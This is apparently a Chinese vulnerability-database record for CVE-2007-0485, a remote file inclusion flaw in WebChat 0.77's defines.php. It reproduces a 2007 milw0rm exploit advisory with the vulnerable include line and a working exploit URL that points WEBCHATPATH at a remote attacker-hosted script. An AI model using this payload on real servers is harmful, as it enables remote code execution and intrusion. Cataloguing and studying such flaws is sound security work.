WebChat 'defines.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112055 漏洞类型 未知
发布时间 2007-01-21 更新时间 2007-01-25
CVE编号 CVE-2007-0485 CNNVD-ID CNNVD-200701-417
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-417
|漏洞详情
WebChat0.77版本的defines.php中存在PHP远程文件包含漏洞。远程攻击者可以借助WEBCHATPATH参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker  
# Contact:   theviper-hacker@hotmail.com 
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-21]
|参考资料

来源:XF
名称:webchat-definesphp-file-include(31624)
链接:http://xforce.iss.net/xforce/xfdb/31624
来源:MILW0RM
名称:3169
链接:http://www.milw0rm.com/exploits/3169
来源:SECTRACK
名称:1006193
链接:http://www.securitytracker.com/id?1006193
来源:BID
名称:7000
链接:http://www.securityfocus.com/bid/7000
来源:BUGTRAQ
名称:20030303WebChat(PHP)
链接:http://www.securityfocus.com/archive/1/archive/1/313610/30/25700/threaded
来源:SECUNIA
名称:8206
链接:http://secunia.com/advisories/8206
来源:MILW0RM
名称:3169
链接:http://milw0rm.com/exploits/3169